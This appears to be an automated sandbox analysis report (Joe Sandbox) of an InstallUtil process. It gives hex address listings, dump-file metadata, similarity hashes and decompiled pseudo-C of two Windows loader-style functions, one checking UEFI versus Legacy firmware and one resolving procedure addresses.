0x00000000
0x0138e752
0x00000000
0x0138e752
0x0138e730
0x0138e735
0x0138e73d
0x0138e73f
0x00000000
0x00000000
0x0138e741
0x0138e741
0x00000000
0x0138e741
0x0138e739
0x00000000
0x00000000
0x0138e73b
0x00000000
0x0138e73b
0x0138e722
0x0138e720
0x0138e6b0
0x0138e618
0x00000000
0x0138e618

Strings

`, xrefs: 0138E670
`, xrefs: 0138E5D7

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: c2c0cf23900a5b78edcb0dfb03a89ff18bcdca1d59502357b8b4e7f390fca087
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 87916E312043429BE725EF29C945B1BBBE5BF84728F14892DF6A5CB290E774E904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013451BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E013451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x13a05f0);
				E0131D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E012DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E013453CA(0);
						return E0131D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0130F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E012E3690(1, _t117, 0x12a1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0130AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L012E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0130AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0134500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01309860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x013451be
0x013451c3
0x013451c8
0x013451cd
0x013451d0
0x013451d3
0x013451d8
0x013451db
0x013451de
0x013451e0
0x013451e3
0x013451e6
0x013451e8
0x01345342
0x01345351
0x01345356
0x0134535a
0x01345360
0x01345363
0x01345366
0x01345369
0x01345369
0x0134536b
0x0134536b
0x01345370
0x013453a3
0x013453a4
0x013453a6
0x013453ab
0x013453ab
0x013453ae
0x013453ae
0x013453b5
0x013453bf
0x013453bf
0x01345375
0x01345396
0x013453a0
0x013453a0
0x00000000
0x01345396
0x01345377
0x01345379
0x0134537f
0x0134538c
0x01345390
0x00000000
0x01345390
0x013451ee
0x013451f1
0x01345301
0x01345310
0x01345315
0x01345318
0x0134531b
0x01345320
0x0134532e
0x01345331
0x00000000
0x01345331
0x01345328
0x01345329
0x00000000
0x01345329
0x013451fa
0x01345235
0x01345236
0x01345239
0x0134523f
0x01345240
0x01345241
0x01345242
0x01345246
0x01345247
0x0134524e
0x01345251
0x01345267
0x01345269
0x0134526e
0x0134527d
0x0134527e
0x01345281
0x01345282
0x01345287
0x01345288
0x0134528a
0x0134528f
0x01345294
0x00000000
0x00000000
0x0134529a
0x0134529c
0x0134529e
0x0134529e
0x013452a4
0x013452b0
0x00000000
0x00000000
0x013452ba
0x013452bc
0x013452bc
0x013452d4
0x013452d9
0x013452dc
0x013452e1
0x00000000
0x00000000
0x013452e7
0x013452f4
0x00000000
0x013452f4
0x01345270
0x00000000
0x01345270
0x013451fc
0x013451fd
0x01345202
0x01345203
0x01345205
0x0134520a
0x0134520f
0x00000000
0x00000000
0x0134521b
0x01345226
0x0134522b
0x0134521d
0x0134521d
0x01345222
0x01345222
0x0134522d
0x00000000

Strings

UEFI, xrefs: 0134521D
Legacy, xrefs: 01345226

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: a9b9867d55d8e2ca1a3c31e3ff491f79da35ef70d32e788c02e3b47eafd8f722
Instruction ID: f8bb6fad4bbfacba8d9ea7429b6a35423e2a7c85cc473b466d8d2e75a4631a06
Opcode Fuzzy Hash: a9b9867d55d8e2ca1a3c31e3ff491f79da35ef70d32e788c02e3b47eafd8f722
Instruction Fuzzy Hash: 40515C71E006099FDB25DFA8C850BAEBBF8FF48708F14406EE649EB291D671A940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012DD5E0 Relevance: 1.9, APIs: 1, Instructions: 353
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E012DD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x13bd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E012D6600(0x13b52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x13b7b9c; // 0x0
							_t281 = L012E4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0130F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x13b7b90; // 0x77460000
								if(_t384 == 0) {
									_t353 =  *0x13b7b8c; // 0xe62aa0
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E012E2280(_t200, 0x13b84d8);
									_t277 =  *0x13b85f4; // 0xe62f90
									_t351 =  *0x13b85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xe62f28
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E012DFFB0(_t287, _t353, 0x13b84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0131CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E012D6600(0x13b52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E012D7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x13bb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0134E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x13b8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x13bb218; // 0x0
														asm("ror edi, cl");
														 *0x13bb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E012E2280(_t250, 0x13b84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01303898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E012DFFB0(_t293, _t353, 0x13b84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E013037F5(_t353, 0);
																}
																E01300413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E012F9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E012F02D6(_t174);
																}
																L012E77F0( *0x13b7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E012FC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L012DEC7F(_t353);
										L012F19B8(_t287, 0, _t353, 0);
										_t200 = E012CF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0130B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x13bb2f8; // 0x0
									if((_t206 |  *0x13bb2fc) == 0 || ( *0x13bb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x13bb2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E01376B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E01376AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E012DE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L012DEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E01309730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E012DE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L012D8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01303C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x012dd5f2
0x012dd5f5
0x012dd5f5
0x012dd5fd
0x012dd600
0x012dd60a
0x012dd60d
0x012dd617
0x012dd61d
0x012dd627
0x012dd62e
0x012dd911
0x012dd913
0x00000000
0x012dd919
0x012dd919
0x012dd919
0x012dd634
0x012dd634
0x012dd634
0x012dd634
0x012dd640
0x012dd8bf
0x00000000
0x012dd646
0x012dd646
0x012dd64d
0x012dd652
0x0132b2fc
0x0132b2fc
0x0132b302
0x0132b33b
0x0132b341
0x00000000
0x0132b304
0x0132b304
0x0132b319
0x0132b31e
0x0132b324
0x0132b326
0x0132b332
0x0132b347
0x0132b34c
0x0132b351
0x0132b35a
0x00000000
0x0132b328
0x0132b328
0x00000000
0x0132b328
0x0132b326
0x012dd658
0x012dd658
0x012dd65b
0x012dd665
0x00000000
0x012dd66b
0x012dd66b
0x012dd66b
0x012dd66b
0x012dd66d
0x012dd672
0x012dd67a
0x00000000
0x00000000
0x012dd680
0x012dd686
0x012dd8ce
0x012dd8d4
0x012dd8dd
0x012dd8e0
0x012dd68c
0x012dd691
0x012dd69d
0x012dd6a2
0x012dd6a7
0x012dd6b0
0x012dd6b5
0x012dd6e0
0x012dd6b7
0x012dd6b7
0x012dd6b9
0x012dd6b9
0x012dd6bb
0x012dd6bd
0x012dd6ce
0x012dd6d0
0x012dd6d2
0x0132b363
0x0132b365
0x00000000
0x0132b36b
0x00000000
0x0132b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x012dd6bf
0x012dd6bf
0x012dd6e5
0x012dd6e7
0x012dd6e9
0x012dd6ec
0x012dd6ec
0x012dd6ef
0x012dd6f5
0x012dd6f9
0x012dd6fb
0x012dd6fd
0x012dd701
0x012dd703
0x012dd70a
0x012dd70a
0x012dd701
0x012dd710
0x012dd710
0x012dd6c1
0x012dd6c1
0x012dd6c6
0x0132b36d
0x0132b36f
0x00000000
0x0132b375
0x0132b375
0x0132b375
0x00000000
0x0132b375
0x00000000
0x012dd6cc
0x012dd6d8
0x012dd6d8
0x012dd6d8
0x00000000
0x012dd6c6
0x012dd6bf
0x00000000
0x012dd6da
0x012dd6da
0x012dd716
0x012dd71b
0x012dd720
0x012dd726
0x012dd726
0x012dd72d
0x00000000
0x012dd733
0x012dd739
0x012dd742
0x012dd750
0x012dd758
0x012dd764
0x012dd776
0x012dd77a
0x012dd783
0x012dd928
0x012dd92c
0x012dd93d
0x012dd944
0x012dd94f
0x012dd954
0x012dd956
0x012dd95f
0x012dd961
0x012dd973
0x012dd973
0x012dd956
0x012dd944
0x012dd92c
0x012dd78b
0x0132b394
0x012dd791
0x012dd798
0x0132b3a3
0x0132b3bb
0x0132b3bb
0x012dd7a5
0x012dd866
0x012dd870
0x012dd884
0x012dd892
0x012dd898
0x012dd89e
0x012dd8a0
0x012dd8a6
0x012dd8ac
0x012dd8ae
0x012dd8b4
0x012dd8b4
0x012dd8ae
0x012dd7a5
0x012dd78b
0x012dd7b1
0x0132b3c5
0x0132b3c5
0x012dd7c3
0x012dd7ca
0x012dd7e5
0x012dd7eb
0x012dd8eb
0x012dd8ed
0x00000000
0x012dd8f3
0x012dd8f3
0x012dd8f3
0x00000000
0x012dd8ed
0x012dd7cc
0x012dd7cc
0x012dd7d2
0x00000000
0x012dd7d4
0x012dd7d4
0x012dd7d7
0x012dd7df
0x0132b3d4
0x0132b3d9
0x0132b3dc
0x0132b3dc
0x0132b3df
0x0132b3e2
0x0132b468
0x0132b46d
0x0132b46f
0x0132b46f
0x0132b475
0x012dd8f8
0x012dd8f9
0x012dd8fd
0x0132b3e8
0x0132b3e8
0x0132b3eb
0x0132b3ed
0x00000000
0x0132b3ef
0x0132b3ef
0x0132b3f1
0x0132b3f4
0x0132b3fe
0x0132b404
0x0132b409
0x0132b40e
